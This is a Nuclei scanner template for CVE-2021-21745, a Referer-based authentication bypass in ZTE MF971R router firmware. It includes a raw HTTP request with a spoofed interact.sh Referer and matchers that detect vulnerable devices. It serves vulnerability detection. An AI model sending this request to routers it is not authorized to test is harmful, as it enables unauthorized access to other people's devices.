nuclei-templates/http/cves/2021/CVE-2021-21745.yaml

50 lines
1.8 KiB
YAML
Raw Normal View History

id: CVE-2021-21745
info:
name: ZTE MF971R - Referer authentication bypass
author: gy741
severity: medium
description: |
ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attackercould
use this vulnerability to perform illegal authorization operations by sending a request to the user to click.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can bypass authentication and gain unauthorized access to the router.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest firmware update provided by ZTE to fix the authentication bypass vulnerability.
reference:
- https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1317
- https://nvd.nist.gov/vuln/detail/CVE-2021-21745
- https://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1019764
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2021-21745
2023-07-11 19:49:27 +00:00
cwe-id: CWE-352
epss-score: 0.26168
epss-percentile: 0.96622
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:o:zte:mf971r_firmware:v1.0.0b05:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: zte
product: mf971r_firmware
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,zte,auth-bypass,router
http:
- raw:
- |
GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1
Host: {{Hostname}}
Referer: http://interact.sh/127.0.0.1.html
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'psw_fail_num_str":"[0-9]'
2022-05-23 10:26:16 +00:00
- type: status
status:
- 200
# digest: 4a0a004730450221009e6426cc572101b45641c767c7e539db75a145714644272d3d163df59b5ea2aa022015d94f5ac290e8fb85ec786f4e590bdf9fe9fbd03a04357cc7dfa9cffa27e110:922c64590222798bb761d5b6d8e72950